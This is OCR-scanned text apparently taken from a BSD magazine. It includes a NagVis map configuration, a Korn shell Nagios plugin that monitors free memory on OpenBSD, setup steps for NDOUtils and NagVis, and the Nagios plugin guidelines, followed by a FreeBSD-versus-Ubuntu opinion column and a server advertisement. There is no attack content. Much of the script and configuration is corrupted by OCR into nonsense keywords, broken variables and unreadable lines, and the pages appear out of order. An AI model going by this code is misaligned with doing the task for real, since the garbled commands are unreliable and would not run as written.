# Coordinates of the host on the map 


include the status 


service on the 


# The 'global' statement sets some default values that 


# List of users allowed to modify this map via the web 


# Defaul iconset (if omitted, it is inherited from the 


# See this GO 17 if Vou Wane Eme Mosk —Stauus tO also 


"www ' 


# As you can see, 'global' options can be overridden 
in subsequent objects 
heOMseu—orC oiled 


i 
J 


# Display the worst state of hosts in the 'WWW' hostgroup 
define hostgroup { 

hostgroup_ name=WwWW 

x=298 

y=363 

GeCcogmmune woe ices — | 


} 
J 


# Display the worst state of services in the 'www- 
services' servicegroup 
define servicegroup { 
Sek Vice LOuUpeMellic -Wwiwisseuy ices 
x=609 
y=363 
} 
# Display the worst state of objects represented in 
another NagVis map 
define map { 
map name=lan 
x=406 
y=323 
} 
# Draw a textfield on the map 
define textbox { 
# Text may include HTML 
text="This is the DMZ network" 
x=490 
y=394 
w=117 
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/usr/local/libexec/nagios/check free mem.sh 


#1 /bin7 ksh 


HeeeHHH Hee H AHH eae a AEE RAAT ERE EEE EERE 

# Sample Nagios plugin to monitor free memory on the 
local machine e 

# Author: Daniele Mazzocchio (http://www. kernel- 
Penieeie7) # 

HeeHHHHH HHH HAH ERA AA a AE a RAE EEE EEE 


VERSION="Version 1.0" 
AUTHOR="(c) 2007-2009 Daniele Mazzocchio (danix@kernel- 


Bante: ac) 
PROGNAME='/usr/bin/basename $0Q' 


# Constants 
BYTES IN MB=$(( 1024 * 1024 )) 
KB IN MB=1024 


# Exit codes 
STATE OK=0 

STATE WARNING=1 
SUL SC IU C7 
STATE UNKNOWN=3 


# Helper functions ###HHtHHtHHtTTTT ETT T 


DUMCELON ir Mires revels On, | 
# Print the revision number 


echo "SPROGNAME — SVERSION" 


TUNCELOM PEInt sages] 
# Print a short usage statement 


echo "Usage: sPROGIAME [=v] =w<limit= —c <limie>” 


FUNCTION print hele .| 
# Print detailed help information 
Prime revision 
echo "SAUTHOR\n\nCheck free memory on local machine\ 
ot 


Print wWsage 


/ oineoew << HOw 


Listing 23a. A plugin to monitor the amount of free memory on the local machine 


Oprlons: 
=a 

Print detailed help screen 
Si 


Prine. version information 


-w INTEGER 
EX1it with WARNING status if less than INTEGER MB of 
memory are free 
-w PERCENTS 
EXit with WARNING status if less than PERCENT of 
memory is free 
=C¢ INTEGER 
EXit with CRITICAL status af less tham INTEGER MB of 
memory are free 
=¢ PERCENE. 
HxXit with CRITICAL Status 2a£ less than PERCENT of 


memory is free 


Verbose output 
KOT 


} 


# Main ###FTTTEE HE PP PE EET EPP TEE HE EP PPE ETE RE 


# Total memory size (in MB) 

tot_mem=$(( '/sbin/sysctl -n hw.physmem' / BYTES IN_ 
MB) ) 

# Free memory size (in MB) 

free mem=$(( '/usr/bin/vmstat | /usr/bin/tail -1 | 
(ise / Din jaw (A print so.) )\ 

/ KB_IN MB )) 
# Free memory size (in percentage) 


free mem perc=5(( free mem * 100 / tot mem )) 


# Verbosity level 
verbosity=0 

# Warning threshold 
Eitesh Warn 

# Critical threshold 


eliceisloy (ise 


# Parse command line options 
while [| Si" ols do 
case “Sl in 
=ir ||; ==he lp) 
Prints hele 
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Listing 23b. A plugin to monitor the amount of free memory on the local machine 


exit $STATE OK 


=V | ==version) 
DElImUseeytsion 


exit colalk OK 


-v | --verbose) 
$(( verbosityt+ )) 
Sina tite 


SA | = Hecainiligiey: |= es 8 | “aereraskieserewlly) 
SE Ns eee allele ae ee Se ce em 
# Threshold not provided 
echo "SPROGNAME: Option 'S1' requires 
an argument" 
Pliny Wsage 
exit SSTATE UNKNOWN 
elie [1 "S2" >= 7 (0=9]) |] then 
# Threshold is a number (MB) 
thresh=$2 
elzt le so eo ils chem 
# Threshold is a percentage 
thresh=5(( tot_mem * ${2%\%} / 100 )) 
else 
# Threshold is neither a number nor 
ape reeteage 
echo "SPROGNAME: Threshold must be 
integer or percentage" 
PEIME Wisage 
exit SSTATE UNKNOWN 
i 
eo aw ec Enncehy warm—ovinte shay || 
Tees yer ii > uibeah 
Sinn 2 


ee 
Ue 


Print Wsage 
exit $STATE OK 


ee 
ead é 


echo "SPROGNAME: Invalid option '$1'" 
Print wsage 
exit SSTATE UNKNOWN 

esac 


done 


oe (NP ever Sielovaersiol shoul @|||| oz Msc sacra) vesaslies || | Hee elaeiml 
# One or both thresholds were not specified 
echo "SPROGNAME: Threshold not set" 
Prime giisage 
exit SSTATE UNKNOWN 
elif [[ "Sthresh crit" -gt "Sthresh warn" ]]; then 
# The warning threshold must be greater than the 
Critical thresnold 
echo "SPROGNAME: Warning free space should be more 
than critical free space" 
Plime, Weage 
exit SSTATE UNKNOWN 
fi 


if || “Sverbosity™ =ge Z ||; then 
# Print debugging information 
juny Cae <<) HOW 
Debugging information: 
WeleaskieKe, teleigetsiore els “Srelaicetsial yielaciy M3 
Grilvical wulimeshoOld cites cohen ME 
Verbosity level: Sverbosity 
Total memory: Stot_mem MB 
Bice Memory t otrce mem ME Wi fice Mempercs) 
HOT 
fi 


if || “Stree mem” “le "Sthresh crit” ||; then 
# Free memory is less than the critical threshold 
Colo y HER CR ITLCAi = Eres Mem Pere. sbices| htees 
mem MB OuL Of 5LOu mem MB)” 
Exit SSTATE CRITICAL 
elif [[ "Sfree mem" -lt "Sthresh warn" ]]; then 
# Free memory is less than the warning threshold 
echo MEMORY WaAnNING=—  ottee mem ipere . tree (> kree, 
Mem ME ORL Or Lou mem ME)” 
exit SSTATE WARNING 
else 
# There's enough free memory! 
ecllo MEMOR OR y = bee- Mem pete 6 ete ere mem 
ME VeWE WOE Faro Men ME) 
exit $SSTATE OK 
fi 
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# patch -p0 < ndo-openbsd.patch 


Now we can start MySQL, assign a password to the root 
account and create the appropriate database and user. 
The database creation script can be found in the ap/ 
directory of the extracted tarball (see Listing 18). 

Now we need to manually copy the binaries and 
configuration files: 


# cp src/ndomod-3x.o /usr/local/libexec/nagios/ndomod.o 

# cp config/ndomod.cfg-sample /var/www/etc/nagios/ 
ndomod.cfg 

+ Cp Src/ndozdo-3% /usr/local/sbin/ndo2db 

# cp config/ndo2db.cfg-sample /var/www/etc/nagios/ 
ndoZdb.crg 


and edit the NDOMOD configuration file: see Listing 19. 
And the NDO2DB configuration file: see Listing 20. 

Then we have to specify the event broker module that 
Nagios must load at startup, by adding the following line 
to the main configuration file: 


/var/www/etc/nagios/nagios.cfg 
broker module=/usr/local/libexec/nagios/ndomod.o config_ 


file=/var/www/etc/nagios/ndomod.cfg 


and, finally, we can start the NDO2DB daemon and 
restart Nagios: 


# /usr/local/sbin/ndo2db -c /var/www/etc/nagios/ndo2db.cfg 
# chmod 770 /var/www/var/nagios/rw/ndo.sock 
# pkill nagios 


# nagios -d /var/www/etc/nagios/nagios.cfg 


Add the following lines to /etc/rc.local to start the 
NDO2DB daemon on boot: 


jece/re.local 
if [| =x /usr/local/sbin/nmdo2db: |; 
echo -n ' ndo2db' 


then 


/usr/local/sbin/ndo2db -c /var/www/etc/nagios/ndo2db.cfg 
chmod 770 /var/www/var/nagios/rw/ndo.sock 


aa 


Configuring NagVis 

Now that we have installed all the necessary prerequisites, 
we can download (http:/www.nagvis.org/downloads) and 
extract the NagVis tarball: 


# tar -zxvf nagvis-x.x.x.tar.gz -C /var/www/nagios/ 


L aoa J 
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# mv /var/www/nagios/nagvis-x.x.x /var/www/nagios/nagvis 


# chown -R www /var/www/nagios/nagvis/{etc,var} 


Below is a sample NagVis configuration file; please 
refer to the documentation (http://docs.nagvis.org/1.3/ 
en_US/index.html) for a detailed description of each 
parameter: 


Maps definition 

Now we have to create the images for NagVis to use as the 
background for each map and put them in the /var/www/nagios/ 
nagvis/images/maps/ directory. You can find a few examples here 
(http:/www.nagvis.org/screenshots).Once the map images 
are ready, we can tell NagVis where to place objects on the 
map by creating and editing the maps configuration files. Each 
map must have a corresponding configuration file (iN /var/www 
/nagios/nagvis/etc/maps/) With the same name, plus the .cfg 
extension. 

Below is a sample map configuration file; syntax is 
rather simple, so you can easily tweak it to include your 
own hosts and services (please refer to the documentation 
(http://docs.nagvis.org/1.3/en_US/index.html) for further 
details; see Listing 22). 

To allow the web interface to modify NagVis' 
configuration, make sure that all configuration files belong 
to, and are writable by, the www user. 


# chown www /var/www/nagios/nagvis/etc/maps/*.cfg 


# chmod 644 /var/www/nagios/nagvis/etc/maps/*.cfg 


Writing your own Nagios plugins 

Plugins are executable files run by Nagios to determine 
the status of a host or service. By default, Nagios comes 
with a very rich set of official plugins that should cover 
most people's needs; in addition, you can find lots of 
contributed plugins on the Monitoring Exchange website 
(http://www.monitoringexchange.org/), some of which 
are also available via OpenBSD's packages and ports 
system. 

However, despite the abundance of plugins, there may 
be occasions in which no existing plugin is suitable for 
monitoring a particular service, thus forcing you to write 
a fully custom plugin, tailored to your exact needs. Luckily, 
this is a very simple task! 

Nagios doesn't bind you to a specific programming 
language: plugins may be either compiled C programs 
or interpreted scripts, in Perl, shell, Python or any other 
language. Nagios doesn't mess with the internals of 
plugins; however, it asks developers to follow a few basic 
guidelines (http://nagiosplug.sourceforge.net/developer- 
guidelines.html), just for standard's sake. 
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Table 1. Valid plugin return codes 


Service/Host status | Service Status description Host status description 


Ok/Up The plugin was able to check the service and The host is up and replied in acceptable time 
it seemed to work correctly 


Critical/Down The service was not running or it exceeded =Thehost is down or some "critical" threshold 
some "critical" threshold was exceeded 
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Command line options 
A plugin's command line must follow some _ specific 
requirements: 


¢ positional arguments are strongly discouraged; 

¢ all plugins should provide a -v command-line option 
(and --version If long options are enabled) to display 
the plugin's revision number; 

e the -: option, as well as any incorrect option, displays 
a short usage statement that should fit on a standard 
80x25 terminal; 


e the -n, Or --neip, option displays detailed help 
information; 
e the -v, Or --verbose, Option adjusts the verbosity level; 


multiple -v options (up to 3) should increase the 
verbosity level, as described in the official guidelines 
(http://nagiosplug.sourceforge.net/developer- 
guidelines.htmlI#HAEN40); 

e There are a few other reserved options that should 
not be used for other purposes: 
¢ -t OF --timeout (plugin timeout); 

¢ -w Of --warning (warning threshold); 

*  -c OF --critical (Critical threshold); 

* -H OF --hostname (name of the host to check). 


Plugin return codes 

Nagios determines the status of a host or service based 
on the return code of the plugin. Valid return codes are: 
see Table 1. 
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The warning and critical thresholds are usually set via 
command line options (see above htto:/www.kernel- 
panic. it/openbsd/nagios/nagios6.htmli#nagios-6. 1). 


A sample plugin script 
Just a couple of notes before moving to a practical 
example: 


¢ plugins can access macros (http:// 
nagios.sourceforge.net/docs/2_O/macros.html) as 
environment variables; such variables have the same 
name as the corresponding macros, with naczos _ 
prepended. For instance, the sxostnames macro will 
be accessible through the "NAGIOS_- HOSTNAME" 
environment variable; 

¢ always specify the full path of any system commands 
run from your plugins. 


Well, so let's see, as an example, what a plugin to 
monitor the amount of free memory on the local machine 
could look like: see Listing 23. 
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The Difference Between 


FreeBSD and Ubuntu in a Not So Technical Way 


As a system administrator, | have been using various distributions 
of Linux and FreeBSD. | am comfortable in a mixed environment of 
*nix operating systems to provide network services. 


possible so as not to start a flame war. | enjoy working 
with both systems and | like the way they are. 

FreeBSD is a complete operating system. Userland 
utilities, drivers for the devices, and the kernel itself are 
available and held in a centralized location/repository. 
Linux on the other hand is actually just the kernel. 
Companies and Organizations release their distribution/ 
flavor by using and customizing the Linux kernel, bundleit 
with software/packages mostly free and open-source 
software, and optionally add some proprietary materials, 
drivers or codecs. This is the case for Ubuntu, the Linux 
distribution released by Canonical, Inc. 

The default shell for regular users in FreeBSD is sh 
Bourne Shell and tesh Improved C Shell for the root user. 
In Ubuntu it is bash all the way. In terms of application 
configuration files, rest assured that FreeBSD keeps them 
in the /usr/local/etc. Ubuntu on the other hand, has this 
directory empty. Ubuntu uses the /etc and its subfolders 
for application configuration files. FreeBSD also uses the / 
etc/rc.conf file, which according to the man page, contains 
descriptive information about the local host name, 
configuration details for any potential network interfaces, 
and services that should be started at system boot up. 

FreeBSD is licensed under the BSD license. This is 
unrestrictive and gives freedom in a way that if an individual 
or an organization used, improved, or modified your code, 
and made a proprietary software from it, the individual or 
organization may or may not credit you. In my personal 
view, this is true freedom. Ubuntu on the other hand is 
licensed mostly under the GPL, which is very restrictive. It 
preserves and protects the openness of the software. 

As for the base installation, in my experience, FreeBSD 
installs faster against the base installation of Ubuntu 
Server. The formatting of partitions in FreeBSD is faster 
than Ubuntu (my personal experience again). In terms 
of software installation, you can choose a variety of 
methods using FreeBSD. My favorite of them all is the 
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ports collection, which you need to be patient and more 
patient when you install. You can also use packages (not 
as complete as the ports collection) and compile sources. 
In Ubuntu, you use the APT system, dpkg packages, and 
you can also compile sources. 

The documentation for FreeBSD is so complete, that you 
will be able to learn a lot of stuff from the OS itself, shells, TCP/ 
IP, and network services. | think Ubuntu’s documentation is 
good too, but not as close as the FreeBSD handbook. Using 
and learning FreeBSD with the help of the handbook and the 
very supportive members of the FreeBSD Forum at htto:/ 
forums.freebsd.org give a new user the experience of learning 
the ins and outs of an operating system in a deeper way. 

lf you want to learn an operating system from the 
internals up to the applications, | would strongly 
recommend FreeBSD for you. You may not be able to do 
things as you expect them to be easy. You will need a lot 
of patience and a couple of hours for software compilation 
(should you choose the ports collection). The learning 
you will gain is worthwhile and you will have a deeper 
understanding of a complete operating system. 

In short, the difference between FreeBSD and Ubuntu 
is in the internals, kernel, startup scripts, ways of software 
installation including management and most system 
utilities and tools. The software and applications they use 
are both free and open source software (FOSS), which 
means gnome is gnome, kde is kde, firefox is firefox, for 
both FreeBSD and Ubuntu. 

As promised, | did not write things that may or will start a 
flame war. | did my best to be honest, fair, and unbiased in 
discussing the difference between FreeBSD and Ubuntu ina 
not so technical way, but in a point of view of a casual user. 


JOSHUA EBARVIA 

Joshua Ebarvia is a java programmer, systems administrator 
and college lecturer. His passion is working and using operating 
systems specially UNIX-based and UNIX-cloned systems. You can 
reach him at joshua.ebarvia@gmail.com 
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Tired of being able to choose from only chocolate, strawberry, 
or vanilla? At iXsystems, we understand your need for custom- 
made servers. 


“Open Source Hardware Design” is the iXsystems trademark. iXsystems provides an 
assortment of pre-configured servers and storage solutions, but our true pride rests on 
our ability to customize our products to meet your specific tastes and needs. iXsystems 
mixes in the raw power of Intel® Xeon® 5600/5500 Series Processors for a truly delicious 
treat. Our Professional Enterprise Service Level packages and desktop support offering 
also enables us to ensure you get the most from your FreeBSD® and PC-BSD™ systems, 
adding the perfect toppings to your order. 


Call iXsystems toll free or visit our website today! 
+1-800-820-BSDi | www.iXsystems.com 


lintel, the Intel loge, and Seon inside are trademarks of registered trademarks of Intel Corporation in the U.5.and ather countries, 
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